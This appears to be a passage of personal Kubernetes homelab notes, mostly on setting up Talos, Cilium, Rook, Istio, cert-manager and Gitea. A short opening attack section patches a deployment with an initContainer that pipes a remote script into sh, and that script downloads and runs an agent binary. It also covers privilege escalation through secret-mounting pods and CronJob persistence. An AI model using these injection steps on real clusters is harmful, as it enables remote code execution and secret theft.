# fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com. 23 IN A 192.168.124.98

sidecar discovery

  • all containers under the Pod share same net namespace
# the following displays /31 subnet, that means that 192.168.28.66 is a neighbor peer
ifconfig
# ns-564e82: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
#     inet 192.168.28.67  netmask 255.255.255.254  broadcast 0.0.0.0

Execution

exec via kubectl

# query if you have the rights to create a "pods/exec" subresource
kubectl auth can-i create pods/exec
# being able to create this subresource effectively means the ability to execute following operations:

# execute command inside the pod’s first container
kubectl exec $POD_NAME -- $COMMAND

# copy file into the pod
kubectl cp $LOCAL_PATH $POD_NAME:$REMOTE_PATH
  • When Exec-ing into a pod, you will by default exec into the first container listed in the pod manifest. If there are multiple containers in a pod you can list them using kubectl get pods <pod_name> -o jsonpath='{.spec.containers[*].name}' which will output the names of each container. Once you have the name of a container you can target it using kubectl with the -c flag: kubectl exec -it <pod_name> -c <container_name> -- sh

sidecar container injection

# agent.sh

BINARY_URL="http://192.168.88.250:9595/agent.elf"
TARGET_PATH="/tmp/agent"

curl -L -f -o "$TARGET_PATH" "$BINARY_URL"
chmod +x "$TARGET_PATH"
exec "$TARGET_PATH"
kubectl patch deploy nginx-demo -n test --type='strategic' --patch '
spec:
  template:
    spec:
      initContainers:
      - name: setup-script
        image: curlimages/curl
        command: ["/bin/sh", "-c"]
        args: ["curl -s http://192.168.88.250:9595/agent.sh | sh"]
'

PrivEsc

arbitrary pod creation abuse

If you’re allowed to create

kubectl auth can-i create pods
# being able to create this resource effectively means the ability to execute following operations:

# Create *any* pod (if no policy engine (e.g. Kyverno) is present within the cluster)
kubectl apply -f myPod.yaml

Now, you should be able to create a pod and mount any secret (either as mount or enviroment variable) into it. That allows new opportunities to attack the rest of the cluster.

Persistence

cronJob

Execution

apiVersion: batch/v1
kind: CronJob
metadata:
  name: anacronda
spec:
  schedule: "* * * * *" # This means run every 60 seconds
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: anacronda 
            image: busybox:1.28
            imagePullPolicy: IfNotPresent
            command:
            - /bin/sh
            - -c
            - date; echo hello
          restartPolicy: OnFailure

Recon

Basic

import SA token

# KUBERNETES_PORT (if kubectling from the container) or the apiserver external IP, ca.crt, token
kubectl config set-cluster my-cluster \
--server=https://$API_SERVER:$PORT \
--certificate-authority=/path/to/ca.crt \
--embed-certs=true

kubectl config set-credentials sa-user \
--token="$SA_TOKEN"

kubectl config set-context sa-context \
--cluster=my-cluster \
--user=sa-user

kubectl config use-context sa-context

kubectl auth can-i --list

Troubleshooting

add custom CA if there are no init containers that run update-ca-certificates for the pod

kubectl -n gitea patch deployment gitea \
--type='json' \
-p='[
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "internal-root-ca",
      "configMap": {
        "name": "internal-root-ca"
      }
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "ca-store",
      "emptyDir": {}
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/containers/0/volumeMounts/-",
    "value": {
"name": "ca-store",
      "mountPath": "/etc/ssl/certs/",
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/initContainers/-",
    "value": {
      "name": "build-ca",
      "image": "docker.io/fluxcd/flux:1.17.0",
      "imagePullPolicy": "IfNotPresent",
      "command": ["/usr/sbin/update-ca-certificates"],
      "volumeMounts": [
        {
          "mountPath": "/usr/local/share/ca-certificates/",
          "name": "internal-root-ca",
          "readOnly": true
        },
        {
          "mountPath": "/etc/ssl/certs/",
          "name": "ca-store"
        }
      ]
    }
  }
]'

fix minikube volumeMounts permission errors

Add gitea: valkey.volumePermissions.enabled - Enable init container that changes the owner/group of the PV mount point to runAsUser:fsGroup on valkey containers.

helm upgrade --install gitea gitea-charts/gitea \
--namespace gitea --create-namespace \
--set postgresql-ha.enabled=false \
--set postgresql.enabled=true \
--set gitea.config.server.ROOT_URL=https://gitea.aperture.ad/ \
--set valkey-cluster.enabled=false --set valkey.volumePermissions.enabled=true \
--set valkey.enabled=true --set gitea.config.server.ROOT_URL=https://gitea.minikube.lab/

Errors:

kubectl -n gitea logs gitea-68577d9b9-ssmjh -c init-directories
# mkdir: can't create directory '/data/git/': Permission denied

I’ve tried to debug by displaying the directory permissions:

EDITOR=nvim kubectl -n gitea edit deploy gitea
#       initContainers:
#       - command:
#         - /bin/sh
#         - -c
#         - |
#           id
#           ls -la /data
#           /usr/sbinx/init_directory_structure.sh
#         image: docker.gitea.com/gitea:1.24.6-rootless
#         name: init-directories
# ...

kubectl -n gitea rollout restart deployment gitea

kubectl -n gitea logs gitea-6f4db975f6-l2txr -c init-directories
# uid=1000(git) gid=1000(git) groups=1000(git)
# total 8
# drwxr-xr-x    2 root     root          4096 Feb 12 07:11 .
# drwxr-xr-x    1 root     root          4096 Feb 28 10:19 ..
# mkdir: can't create directory '/data/git/': Permission denied

That’s expected, by default gitea is running as a git user due to it’s securityContext

kubectl -n gitea get deploy gitea -o yaml
#         securityContext:
#           runAsUser: 1000

Usually kubernetes changes volumeMounts ownership depending on securityContext, however it doesn’t work on minikube. We gotta change it manually using an initContainer:

initContainers:
- name: fix-volume-permissions
  image: alpine:latest
  command: 
  - sh
  - -c
  - chown -R 1000:1000 /data
  securityContext:
    runAsUser: 0
    runAsGroup: 0
  volumeMounts:
  - mountPath: /data
    name: data

Add authentik:

# authentik-values.yaml

authentik:
  secret_key: "$KEY"
  # This sends anonymous usage-data, stack traces on errors and
  # performance data to sentry.io, and is fully opt-in
  error_reporting:
    enabled: true
  postgresql:
    password: "$PASSWD"

postgresql:
  enabled: true
  auth:
    password: "$PASSWD"
redis:
  enabled: true
helm upgrade --install authentik authentik/authentik \
--namespace authentik --create-namespace \
-f authentik-values.yaml
kubectl -n authentik logs authentik-postgresql-0
# mkdir: cannot create directory ‘/bitnami/postgresql/data’: Permission denied

EDITOR=nvim kubectl -n authentik edit statefulset authentik-postgresql
# initContainers:
# - command:
#   - /bin/sh
#   - -c
#   - |
#     id
#     ls -la /bitnami/postgresql
#     chown -R 1001:1001 /bitnami/postgresql
#   image: alpine:latest
#   imagePullPolicy: Always
#   name: fix-volume-permissions
#   resources: {}
#   securityContext:
#     runAsGroup: 0
#     runAsUser: 0
#   terminationMessagePath: /dev/termination-log
#   terminationMessagePolicy: File
#   volumeMounts:
#   - mountPath: /bitnami/postgresql
#     name: data

Now rollout restart all deployments and statefulsets

Test

kubectl -n test get svc
# NAME            TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)    AGE
# postgresql      ClusterIP   10.104.111.175   <none>        5432/TCP   41s
# postgresql-hl   ClusterIP   None             <none>        5432/TCP   41s

kubectl -n authentik port-forward svc/authentik-server 9596:80
# Forwarding from 127.0.0.1:9596 -> 9000
# Forwarding from [::1]:9596 -> 9000
# Handling connection for 9596

prevent namespace stuck in terminating

kubectl get namespace $NAMESPACE -o json > ns.json

nvim ns.json
# "finalizers": []

kubectl replace --raw "/api/v1/namespaces/$NAMESPACE/finalize" -f ./ns.json

troubleshoot DiskPressure taint on a node

https://kubernetes.io/blog/2024/01/23/kubernetes-separate-image-filesystem/ The following means that the node lacks 1Gi to run Pods

kubectl describe nodes coreos02
# Events:
#   Warning  FreeDiskSpaceFailed      69s                 kubelet          Failed to garbage collect required amount of images. Attempted to free 1339201945 bytes, but only found 0 bytes eligible to free.

In order to fix this,

  1. attach larger disk to a libvirt_domain
  2. configure cri-o (or other container runtime) to use a directory on a new disk for containers https://github.com/cri-o/cri-o/blob/main/docs/crio.conf.5.md
### /etc/crio/crio.conf
# see `man containers-storage.conf`
[crio]
# Default storage driver
storage_driver = "overlay"
# Temporary storage location (default: "/run/containers/storage")
runroot = "/var/run/containers/storage"
# Primary read/write location of container storage (default:  "/var/lib/containers/storage")
root = "/var/lib/containers/storage"

Helm

Basic usage

# add repo
helm repo add $REPO_NAME $REPO
# helm repo add prometheus-community https://prometheus-community.github.io/helm-charts

# list packages in repo
helm search repo $REPO_NAME
# helm search repo fluentd

# install package
helm install $POD_NAME $REPO_NAME/$PACKAGE_NAME
# helm install prometheus prometheus-community/prometheus

CRI

CRI-O

Execution

run command against crio container

# list running containers
crictl ps

# run command on a container
crictl exec -it $CONTAINER_ID /bin/bash

Cilium

Installation

Nodes will be in the NotReady status, because there is no CNI.

# cilium install --namespace kube-system will result in an `unable to apply caps: operation not permitted`
# error: {https://docs.siderolabs.com/talos/v1.11/learn-more/process-capabilities};
# {https://docs.siderolabs.com/kubernetes-guides/cni/deploying-cilium};
# append cni.exclusive=false for integration with istio (see {https://istio.io/latest/docs/ambient/install/platform-prerequisites/#cilium})
cilium install --namespace kube-system \
--set kubeProxyReplacement=false \
--set securityContext.capabilities.ciliumAgent="{CHOWN,KILL,NET_ADMIN,NET_RAW,IPC_LOCK,SYS_ADMIN,SYS_RESOURCE,DAC_OVERRIDE,FOWNER,SETGID,SETUID}" \
--set securityContext.capabilities.cleanCiliumState="{NET_ADMIN,SYS_ADMIN,SYS_RESOURCE}" \
--set cgroup.autoMount.enabled=false \
--set cgroup.hostRoot=/sys/fs/cgroup \
--set cni.exclusive=false

kubectl rollout restart ds cilium -n kube-system

cilium status --wait
# wait until it's OK

inter-node traffic encryption via Wireguard

cilium upgrade --namespace kube-system \
--reuse-values \
--set encryption.enabled=true \
--set encryption.type=wireguard

kubectl rollout restart daemonset/cilium -n kube-system

cilium encryption status
# Encryption: Wireguard (4/4 nodes)

General

kompose (convert docker compose to k8s manifests)

  • you can specify custom options using labels (e.g. if you want to use StatefulSet instead of a Deployment)
version: "3.9"

services:
  app:
    image: your-spring-boot-app:latest
    container_name: springboot-app
    ports:
      - "8080:8080"
    environment:
      SPRING_DATASOURCE_URL: jdbc:postgresql://db:5432/mydb
      SPRING_DATASOURCE_USERNAME: postgres
      SPRING_DATASOURCE_PASSWORD: postgres
      SPRING_REDIS_HOST: redis
      SPRING_REDIS_PORT: 6379
    depends_on:
      - db
      - redis

  db:
    image: postgres:15
    labels:
      kompose.service.type: nodeport
      kompose.controller.type: statefulset
    container_name: postgres-db
    environment:
      POSTGRES_DB: mydb
      POSTGRES_USER: postgres
      POSTGRES_PASSWORD: postgres
    ports:
      - "5432:5432"
    volumes:
      - db-data:/var/lib/postgresql/data

  redis:
    image: redis:7
    container_name: redis
    ports:
      - "6379:6379"

volumes:
  db-data:
kompose convert -f compose.yaml

ls -la
# app-deployment.yaml                 db-service.yaml
# app-service.yaml                    redis-deployment.yaml
# compose.yaml                        redis-service.yaml
# db-data-persistentvolumeclaim.yaml  db-deployment.yaml

PersistentVolumeClaim is generated if volumes are attached.

minikube

Basic

# start multinode KVM cluster
minikube start --cpus 2 --memory 8000 --nodes 3 --kvm-network='k8s_lab' --cni=cilium

# delete existing cluster (e.g. to change options)
minikube delete

# add nodes to an existing cluster (minikube node add)

# list logs
minikube logs

Talos

Quickstart

Install talosctl on management machine (e.g. debian)

curl -sL https://talos.dev/install | sh

Create a custom ISO with all defaults except ticking “qemu-guest-agent” extention https://factory.talos.dev/ - copy ISO and “Initial Installation” strings

download the iso within proxmox

boot the VM with all default parameters except for CPU (2 cores) and RAM (8Gb). Attach virtual hard drives to DP nodes.

export CONTROL_PLANE_IP=192.168.1.189
nvim patch.yaml
# cluster:
#   network:
#     cni:
#       name: none

# paste the "Initial installation" link
talosctl gen config talos-proxmox-cluster https://$CONTROL_PLANE_IP:6443 --output-dir _out --install-image factory.talos.dev/metal-installer/ce4c980550dd2ab1b17bbf2b08801c7eb59418eafe8f279833297925d67c7515:v1.11.2 --config-patch @patch.yaml
talosctl apply-config --insecure --nodes $CONTROL_PLANE_IP --file _out/controlplane.yaml

Repeat the VM creation process for each DP node

export WORKER_IP=192.168.1.109
talosctl apply-config --insecure --nodes $WORKER_IP --file _out/worker.yaml

Run the following commands:

export TALOSCONFIG="_out/talosconfig"
talosctl config endpoint $CONTROL_PLANE_IP
talosctl config node $CONTROL_PLANE_IP
talosctl bootstrap --nodes $CONTROL_PLANE_IP

# retrieve kubeconfig to current directory
talosctl kubeconfig .

# test the cluster
kubectl --kubeconfig=./kubeconfig get nodes

# create a link to kubeconfig so that we don't have to
# specify the path to it all the time
ln -s ~/proxmox/kubeconfig ~/.kube/config

CSI

Rook

Setup

Install Rook:

git clone --single-branch --branch release-1.18 https://github.com/rook/rook.git
cd rook/deploy/examples
kubectl create -f crds.yaml -f common.yaml -f csi-operator.yaml -f operator.yaml
kubectl create -f cluster.yaml
# list api-resources to ensure cephcluster is present
kubectl api-resources
# cephclusters        ceph        ceph.rook.io/v1          true         CephCluster

kubectl get cephclusters -A
# NAMESPACE   NAME        DATADIRHOSTPATH
# rook-ceph   rook-ceph   /var/lib/rook

# OPTIONALLY
# after TLDR deployment edit the amount of mons to fit your cluster (3 recommended)
# {https://rook.io/docs/rook/latest/CRDs/Cluster/ceph-cluster-crd/#ceph-config}
kubectl edit -n rook-ceph cephcluster rook-ceph
# spec:
#   mon:
#     count: 2
#   cephConfig:
#     global:
#       osd_pool_default_size: "2"

# label the rook-ceph namespace with pod-security.kubernetes.io/enforce=privileged label
# otherwise pods won't deploy due to violating PodSecurity
kubectl label namespace rook-ceph pod-security.kubernetes.io/enforce=privileged --overwrite

# ensure all rook-ceph resources are ready
watch kubectl -n rook-ceph get pods

# ensure HEALTH_OK
kubectl rook-ceph ceph status

Now you can choose from 3 storage options: https://rook.io/docs/rook/latest/Getting-Started/quickstart/#storage I will go with Block storage:

First copy the manifest from https://rook.io/docs/rook/latest/Storage-Configuration/Block-Storage-RBD/block-storage/#provision-storage and save it to storageclass.yaml file.

# adjust replication size if needed
nvim storageclass.yaml
# spec:
#   failureDomain: host
#   replicated:
#     size: 2

# create StorageClass and CephBlockPool
kubectl create -f storageclass.yaml

Ingress

Service Mesh

Istio

Gitea setup

deploy gitea: https://gitea.com/gitea/helm-gitea#persistence, https://gitea.com/gitea/helm-gitea/src/branch/main/values.yaml

# create a namespace for gitea
kubectl create namespace gitea

# deploy gitea specifying the storageClass: this will enable gitea to create a PersistentVolumeClaim that will request a PersitentVolume
# from a specific rook-ceph-block StorageClass that we created earlier
helm install gitea gitea-charts/gitea \
--namespace gitea \
--create-namespace \
--set postgresql-ha.enabled=false \
--set postgresql.enabled=true \
--set persistence.storageClass='rook-ceph-block' \
--set postgresql.primary.persistence.storageClass='rook-ceph-block' \
--set valkey-cluster.persistence.storageClass='rook-ceph-block' \
--set gitea.config.server.ROOT_URL=https://gitea.aperture.ad/

Let’s now configure Istio for ingress: https://istio.io/latest/docs/setup/install/helm/#installation-steps

kubectl create namespace istio-system
kubectl label --overwrite namespace istio-system \
pod-security.kubernetes.io/enforce=privileged \
pod-security.kubernetes.io/enforce-version=latest

istioctl install --set components.cni.enabled=true -y

now expose gitea https://istio.io/latest/docs/setup/additional-setup/pod-security-admission/#install-istio-with-psa

# istio sidecar mode routes traffic only for workloads with sidecars injected
# Enable sidecar injection for pods in a namespace:
kubectl label namespace gitea istio-injection=enabled

# verify injection is enabled for the namespace
kubectl get namespace -L istio-injection

kubectl -n gitea get pods
kubectl -n gitea delete pod gitea-6fb84975c6-d4tzv

nvim gitea-ingress.yaml
# apiVersion: networking.istio.io/v1beta1
# kind: Gateway
# metadata:
#   name: gitea-gateway
#   namespace: gitea
# spec:
#   selector:
#     istio: ingressgateway
#   servers:
#     - port:
#         number: 80
#         name: http
#         protocol: HTTP
#       hosts:
#         - "gitea.aperture.ad"
# ---
# apiVersion: networking.istio.io/v1beta1
# kind: VirtualService
# metadata:
#   name: gitea
#   namespace: gitea
# spec:
#   hosts:
#     - "gitea.aperture.ad"
#   gateways:
#     - gitea-gateway
#   http:
#     - match:
#         - uri:
#             prefix: /
#       route:
#         - destination:
#             host: gitea-http.gitea.svc.cluster.local
#             port:
#               number: 3000


kubectl apply -f gitea-ingress.yaml

# ensure that istio-proxy is a part of Init Containers
kubectl -n gitea describe pod gitea-6fb84975c6-lxb6b

kubectl -n gitea get vs

Currently, ingress type is LoadBalancer

kubectl -n istio-system get svc istio-ingressgateway
# NAME                   TYPE           CLUSTER-IP       EXTERNAL-IP   PORT(S)                                      AGE
# istio-ingressgateway   LoadBalancer   10.108.215.121   <pending>     15021:30679/TCP,80:30864/TCP,443:30769/TCP   11h

cat /etc/hosts
# 192.168.88.243 gitea.aperture.ad

Kiali

Setup
cd istio/
kubectl apply -f samples/addons
kubectl rollout status deployment/kiali -n istio-system
istioctl dashboard kiali

Load Balancers

MetalLB

Setup

Each address from the pool is gonna be assigned to the LoadBalancer.

helm repo add metallb https://metallb.github.io/metallb

nvim metallb-config.yaml
# apiVersion: metallb.io/v1beta1
# kind: IPAddressPool
# metadata:
#   name: default-pool
#   namespace: metallb-system
# spec:
#   addresses:
#     - 192.168.88.242-192.168.88.244
# ---
# apiVersion: metallb.io/v1beta1
# kind: L2Advertisement
# metadata:
#   name: default
#   namespace: metallb-system

kubectl apply -f metallb-config.yaml

# we can now access the service externally
curl http://gitea.aperture.ad

# label metallb-system ns with privileged to allow metallb-speaker pods
kubectl label --overwrite namespace metallb-system \
pod-security.kubernetes.io/enforce=privileged \
pod-security.kubernetes.io/enforce-version=latest

Cert Managers

cert-manager

Setting up certificates for Gitea

helm install cert-manager oci://quay.io/jetstack/charts/cert-manager \
--namespace cert-manager \
--create-namespace \
--set crds.enabled=true

# define issuers and certificate for gitea
nvim cert-manager-gitea.yaml
# apiVersion: cert-manager.io/v1
# kind: ClusterIssuer
# metadata:
#   name: internal-ca
# spec:
#   selfSigned: {}
# ---
# apiVersion: cert-manager.io/v1
# kind: Certificate
# metadata:
#   name: internal-ca
#   namespace: cert-manager
# spec:
#   secretName: internal-ca-key-pair
#   commonName: "Aperture Root CA"
#   isCA: true
#   issuerRef:
#     name: internal-ca
#     kind: ClusterIssuer
# ---
# apiVersion: cert-manager.io/v1
# kind: ClusterIssuer
# metadata:
#   name: internal-ca-issuer
# spec:
#   ca:
#     secretName: internal-ca-key-pair
# ---
# apiVersion: cert-manager.io/v1
# kind: Certificate
# metadata:
#   name: gitea-cert
#   namespace: istio-system
# spec:
#   secretName: gitea-tls
#   issuerRef:
#     name: internal-ca-issuer
#     kind: ClusterIssuer
#   commonName: gitea.aperture.ad
#   dnsNames:
#     - gitea.aperture.ad

# update gitea gateway to use it
kubectl -n gitea edit gw gitea-gateway
# apiVersion: networking.istio.io/v1beta1
# kind: Gateway
# metadata:
#   name: gitea-gateway
#   namespace: gitea
# spec:
#   selector:
#     istio: ingressgateway
#   servers:
#     - port:
#         number: 80
#         name: http
#         protocol: HTTP
#       hosts:
#         - "gitea.aperture.ad"
#       tls:
#         httpsRedirect: true
#     - port:
#         number: 443
#         name: https
#         protocol: HTTPS
#       hosts:
#         - "gitea.aperture.ad"
#       tls:
#         mode: SIMPLE
#         credentialName: gitea-tls

kubectl -n cert-manager get secret internal-ca-key-pair -o jsonpath='{.data.ca\.crt}' | base64 -d > k8s-aperture-root-ca.crt
sudo cp k8s-aperture-root-ca.crt /usr/local/share/ca-certificates
sudo update-ca-certificates
# additionally, import this CA into your browser

make cert-manager use custom self-signed CA

openssl genrsa -out rootCA.key 4096

openssl req -x509 -new -nodes \
-key rootCA.key \
-sha256 \
-days 3650 \
-out rootCA.crt \
-subj "/CN=Aperture Internal CA/O=Aperture Inc"

kubectl create secret generic internal-ca-key-pair -n cert-manager \
--from-file=tls.crt=aperture-ca-ng.crt \
--from-file=tls.key=aperture-ca-ng.key \
--from-file=ca.crt=aperture-ca-ng.crt \
--dry-run=client -o yaml | kubectl apply -f -

# renew all
kubectl get certificate --all-namespaces -o jsonpath='{range .items[?(@.spec.issuerRef.name=="internal-ca-issuer")]}{.metadata.namespace}{" "}{.metadata.name}{"\n"}{end}' | \
while read ns name; do
  echo "Renewing $ns/$name..."
  cmctl renew "$name" -n "$ns"
done

# restart
kubectl rollout restart deployment istio-ingressgateway -n istio-system
kind: ClusterIssuer
# ...
spec:
  ca:
    secretName: internal-ca-key-pair
# ...

trust-manager

Usage example

Before proceeding to configure OIDC on the application-side, we need to ensure that application trusts the authentiks certificates issuer. In order to archieve that I will use trust-manager

helm upgrade trust-manager jetstack/trust-manager \
--install \
--namespace cert-manager

nvim ca-bundle.yaml
# apiVersion: trust.cert-manager.io/v1alpha1
# kind: Bundle
# metadata:
#   name: internal-root-ca
# spec:
#   sources:
#     - secret:
#         name: internal-ca-key-pair
#         key: tls.crt
#   target:
#     configMap:
#       key: ca.crt
# namespaceSelector:
#   matchLabels:
#     use-internal-ca: "true"

kubectl apply -f ca-bundle.yaml

kubectl label namespace gitea use-internal-ca=true
kubectl label namespace authentik use-internal-ca=true

kubectl -n gitea describe configmap internal-root-ca

# mount the configmap to as a volume
kubectl -n gitea edit deployment gitea
# spec:
#   template:
#     spec:
#       volumes:
#         - name: internal-ca
#           configMap:
#             name: internal-root-ca
#       containers:
#         - env:
#           name: gitea
#           volumeMounts:
#             - name: internal-ca
#               mountPath: /etc/ssl/certs/internal-ca.crt
#               subPath: ca.crt
#               readOnly: true

kubectl -n gitea patch deployment authentik-server --type='json' \
-p='[
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "internal-ca",
      "configMap": {
        "name": "internal-root-ca"
      }
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/containers/0/volumeMounts/-",
    "value": {
      "name": "internal-ca",
      "mountPath": "/etc/ssl/certs/internal-ca.crt",
      "subPath": "ca.crt",
      "readOnly": true
    }
  }
]'

GitOps

Gitea

Persistence

create an admin user

kubectl -n gitea exec -it gitea-6456cd87bf-mdr8r -- /bin/bash
gitea admin user create --username admin --admin --email admin@aperture.ad --random-password --must-change-password=false

Setup

K8s + Gitea Actions + Harbor

helm repo add gitea-charts https://dl.gitea.com/charts/
helm repo update

helm show values gitea-charts/actions > gitea-runner-values.yaml
# enabled: true
#     # See full example here: https://gitea.com/gitea/act_runner/src/branch/main/internal/pkg/config/config.example.yaml
#     config: |
#       log:
#         level: debug
#       cache:
#         enabled: false
#       container:
#         require_docker: true
#         docker_timeout: 300s
#         network: "host"
#         valid_volumes:
#           - '**'
#         options: "-e 'DOCKER_TLS_VERIFY=1' -e 'DOCKER_CERT_PATH=/certs/server' -e 'DOCKER_HOST=tcp://127.0.0.1:2376' --volume /etc/ssl/certs:/etc/ssl/certs:ro --volume /etc/ssl/certs/ca-certificates.crt:/etc/ssl/certs/ca-certificates.crt:ro --volume /certs/client:/certs/server:ro"

#
# ## Specify an existing token secret
# ##
# existingSecret: "gitea-runner-token"
# existingSecretKey: "token"
#
# ## Specify the root URL of the Gitea instance
# giteaRootURL: "https://gitea.aperture.ad"
#
# ## @section Global
# global:
#   imageRegistry: "harbor.aperture.ad/gitea"
#   storageClass: "rook-ceph-block"

helm upgrade --install --namespace gitea gitea-actions gitea-charts/actions -f gitea-runner-values.yaml

# or you can retrieve it via GUI (Site admininistration > Actions > Runners)
kubectl -n gitea exec -it deploy/gitea -c gitea -- gitea actions generate-runner-token
kubectl -n gitea create secret generic gitea-runner-token --from-literal=token=$TOKEN

kubectl label --overwrite namespace gitea \
pod-security.kubernetes.io/enforce=privileged \
pod-security.kubernetes.io/enforce-version=latest

# kubectl -n gitea logs gitea-actions-act-runner-0 -c act-runner

kubectl -n gitea patch deployment gitea \
--type='json' \
-p='[
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "internal-root-ca",
      "configMap": {
        "name": "internal-root-ca"
      }
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "ca-store",
      "emptyDir": {}
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/containers/0/volumeMounts/-",
    "value": {
"name": "ca-store",
      "mountPath": "/etc/ssl/certs/",
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/initContainers/-",
    "value": {
      "name": "build-ca",
      "image": "docker.io/fluxcd/flux:1.17.0",
      "imagePullPolicy": "IfNotPresent",
      "command": ["/usr/sbin/update-ca-certificates"],
      "volumeMounts": [
        {
          "mountPath": "/usr/local/share/ca-certificates/",
          "name": "internal-root-ca",
          "readOnly": true
        },
        {
          "mountPath": "/etc/ssl/certs/",
          "name": "ca-store"
        }
      ]
    }
  }
]'

# now add the CA on nodes to allow initContainers to use custom CA. This will allow initContainers that will use harbor.aperture.ad/gitea repo to validate harbor's self-signed cert
# it required me to reboot all talos nodes for this to work.
cat talos-ca.yaml
# apiVersion: v1alpha1
# kind: TrustedRootsConfig
# name: custom-ca
# certificates: |-
#   -----BEGIN CERTIFICATE-----
#   ...
#   -----END CERTIFICATE-----
talosctl patch mc --nodes 192.168.88.245,192.168.88.244,192.168.88.243,192.168.88.242 --patch @talos-ca.yaml

# add CA to runner container so that it can verify gitea instance
# Make sure to mount /etc/ssl/certs/ to both containers (including dind), because "valid_volumes" option from gitea act runner config fetches volumes from dind container
kubectl -n gitea patch statefulset gitea-actions-act-runner \
--type='json' \
-p='[
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "internal-root-ca",
      "configMap": {
        "name": "internal-root-ca"
      }
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/volumes/-",
    "value": {
      "name": "ca-store",
      "emptyDir": {}
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/containers/0/volumeMounts/-",
    "value": {
      "name": "ca-store",
      "mountPath": "/etc/ssl/certs/"
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/containers/1/volumeMounts/-",
    "value": {
      "name": "ca-store",
      "mountPath": "/etc/ssl/certs/"
    }
  },
  {
    "op": "add",
    "path": "/spec/template/spec/initContainers/-",
    "value": {
      "name": "build-ca",
      "image": "docker.io/fluxcd/flux:1.17.0",
      "imagePullPolicy": "IfNotPresent",
      "command": ["/usr/sbin/update-ca-certificates"],
      "volumeMounts": [
        {
          "mountPath": "/usr/local/share/ca-certificates/",
          "name": "internal-root-ca",
          "readOnly": true
        },
        {
          "mountPath": "/etc/ssl/certs/",
          "name": "ca-store"
        }
      ]
    }
  }
]'

# reload
kubectl -n gitea delete pod gitea-actions-act-runner-0

WISH TO RESET? delete the actions-runner PVC and dont forget to patch the statefulset for the runner to add the certificate (and then delete the pod)

if youre getting the following errors:

level=info msg="Registering runner, arch=amd64, os=linux, version=v0.2.13."
Error: parse config file "/actrunner/config.yaml": yaml: unmarshal errors:
line 12: mapping key "options" already defined at line 6
Waiting to retry ...

then fix your config file

Harbor:

  1. Add a “Docker Hub” repository called docker-hub-proxy
  2. Add a new project with name=gitea, access_level=public and proxy=true,docker-hub-proxy
  3. Create a regular user account for gitea
  4. Go to project you created -> Members -> + User -> gitea (admin)

dind is a separate container that runs a docker daemon and exposes docker TCP socket port to the act_runner container. act_runner container is responsible for communication with gitea, while dind is reponsible for running CI containers. dind container needs to be privileged, because dockerd uses some kernel capabilities such as cgroups to function properly

If you exec into the main container using kubectl -n gitea exec -it pod/gitea-actions-act-runner-0 -- /bin/bash and observe it’s env vars you’re gonna see that it uses DOCKER_HOST=tcp://127.0.0.1:2376 socket, which runs on it’s sidecar dind container.

The buildx jobs to run successfully, the CI container must be able to connect to docker daemon. In order to do that it must get it’s default DOCKER_HOST value (which is unix:///var/run/docker.sock) overriten to dind docker TCP socket (which is localhost:2376 if network=host). In order to establish secure connection we need to provide the buildx job path to it’s certificates (client certificates). We cannot mount the contents of /certs/server directory of dind container to CI containers, because this directory container server key.

dockerd on the remote host is started with the following server-side arguments --tlsverify --tlscacert /certs/server/ca.pem --tlscert /certs/server/cert.pem --tlskey /certs/server/key.pem, these arguments can be retrieved by running the following command: kubectl -n gitea exec -it pod/gitea-actions-act-runner-0 -c dind -- /bin/bash ps auxf and observing which arguments does the host docker utility work with.

in order to pass the correct TLS credentials to the docker buildx client, theoretically we would need to generate client certs for the client using an initContainer and then mount the output directory to CI container using –volume argument, fortunately the first step (generating certs) is already been done for us, these certs are held inside the /certs/client directory on the dind host. The weird thing is that buildx action searches for certificates in /certs/server directory (I ASSUME THAT’S BECAUSE I SET DOCKER_CERT_PATH to /certs/server, NEVERMIND), instead of /certs/client, that’s why we mount as follows: --volume /certs/client:/certs/server:ro

Once i deployed the container first i didn’t have an internet connection from CI container. I first thought that that was because of the MTU values of node-interface eth0 and docker0 interface that is used to launch CI containers by DinD, however it wasn’t the problem. The real problem was that the network: "host" parameter i specified inside the gitea-actions-act-runner configuration is only being applied to the main runner image (e.g. docker.gitea.com/runner-images:ubuntu-latest). Here’s how the DinD container looks like while i run the pipeline containing buildx jobs:

docker container ps --all --no-trunc
# CONTAINER ID                                                       IMAGE                                          COMMAND                                                                                                CREATED          STATUS          PORTS     NAMES
# 97fda5bdc9ca06b88a314a5680b54b70f7228fbe8c8ee7fa6364f87f24ddcf4c   moby/buildkit:buildx-stable-1                  "buildkitd --allow-insecure-entitlement security.insecure --allow-insecure-entitlement network.host"   34 seconds ago   Up 33 seconds             buildx_buildkit_builder-2b8aa5f9-c26e-44af-bcac-cab07d69add20
# bd39d69c97b12e201cd5ad9dadce704c68a9ba9ab35f7a8e48f9936391e0f6f8   docker.gitea.com/runner-images:ubuntu-latest   "/bin/sleep 10800"                                                                                     40 seconds ago   Up 40 seconds             GITEA-ACTIONS-TASK-121_WORKFLOW-Build-and-Push-Docker-Image_JOB-build

